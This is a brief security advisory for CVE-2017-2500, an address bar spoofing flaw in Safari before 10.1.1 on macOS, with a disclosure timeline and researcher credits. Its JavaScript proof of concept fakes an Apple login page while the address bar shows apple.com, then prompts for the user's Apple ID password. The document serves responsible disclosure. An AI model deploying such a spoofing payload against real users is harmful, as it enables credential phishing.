| Apple safari

(CVE-2017-2500)Address bar spoofing on macOS Safari

Affected Products

Safari <10.1.1 on macOS

Description

When we input an URL including a special port or visit a domain which exists in DNS record but cannot access anymore (such as “http://www.apple.com:1234" or “http://access.apple.com"), Safari will try its best to load this address, so address bar spoofing could occur during the loading time!

Proof of concept

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<script>
function spoof(){

document.write("<title>Apple login</title><h1>Trust me!This is apple.com!</h1>");

window.location.assign("http://www.apple.com:1234");
//or you can use the following script:
//window.location.assign("http://access.apple.com");

}
setInterval(spoof(),2000);
setTimeout(function(){
    prompt('Checking your appid password:');
},6000);
</script>

Disclosure Timelines

2017/2/7 Provide vulnerability detail to APPLE via product-security@apple.com
2017/4/26 Apple fix it in Safari 10.1.1
2017/5/12 CVE-2017-2500 assigned.

Credit

This vulnerability was discovered by Zhiyang Zeng and Yuyang Zhou of Tencent Security Platform Department.